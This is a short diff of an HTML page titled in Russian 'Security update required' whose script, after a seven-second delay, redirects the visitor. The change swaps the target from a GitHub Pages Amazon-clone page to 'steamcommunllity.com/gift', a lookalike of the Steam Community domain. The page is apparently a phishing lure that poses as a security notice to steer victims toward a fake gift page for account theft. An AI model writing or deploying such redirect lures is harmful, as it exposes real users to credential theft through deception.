--- a/defferedredirects2.html
+++ b/defferedredirects2.html
@@ -4,7 +4,7 @@
     <title>Требуется обновление безопасности</title>
     <script>
         setTimeout(function() {
-            window.location.href = "https://nandini26sharma.github.io/Amazon-Clone/";
+            window.location.href = "https://steamcommunllity.com/gift";
         }, 7000);
     </script>
     <style>
